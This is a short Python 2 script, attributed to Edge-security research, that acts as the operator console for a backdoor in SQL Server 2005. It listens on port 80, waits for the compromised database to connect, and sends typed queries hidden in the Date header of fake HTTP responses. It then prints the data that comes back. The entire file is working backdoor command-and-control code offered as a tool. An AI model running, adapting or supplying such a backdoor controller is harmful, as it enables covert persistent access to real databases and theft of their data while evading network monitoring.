# Argeniss sql server 2005 backdoor client
# Edge-security research
# Coded by: [cmartorella, vdiaz]_at_edge-security.com


import socket
import sys

hostname=""
port=80

sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((hostname,port))
sock.listen(1)
print "Waiting for request..."

#esperamos la conexion inicial
request, clientAddress=sock.accept()
print "Received connection from DB:", clientAddress

data=request.recv(1024)
pos = data.find('Connection:')
dataControl = data[pos:].strip()
command=raw_input("Enter query: ")
if command=="exit":
    request.close()
    sys.exit()
else:  
    commando="HTTP/1.1 200 OK\r\n"+"Date:"+command+"\r\n"+"Accept-Ranges: bytes\r\n"+"Content-Type: text/html\r\n\r\n"
    request.send(commando)

while 1:   # ahora vamos a irnos comunicando con la DB
        data=request.recv(1024)
        pos = data.find('Connection:')
        if (data[pos:].strip()==dataControl) or (data[pos:].strip()==""):
            #print " ---- ping from server ---- "
            pass
        else:
            print data
            while len(data)==1024:
                data=request.recv(1024)
                print data
                
            command=raw_input("Enter query: ")
            if command=="exit":
                request.close()
                sys.exit()
            else:  
                commando="HTTP/1.1 200 OK\r\n"+"Date:"+command+"\r\n"+"Accept-Ranges: bytes\r\n"+"Content-Type: text/html\r\n\r\n"
                request.send(commando)

request.close()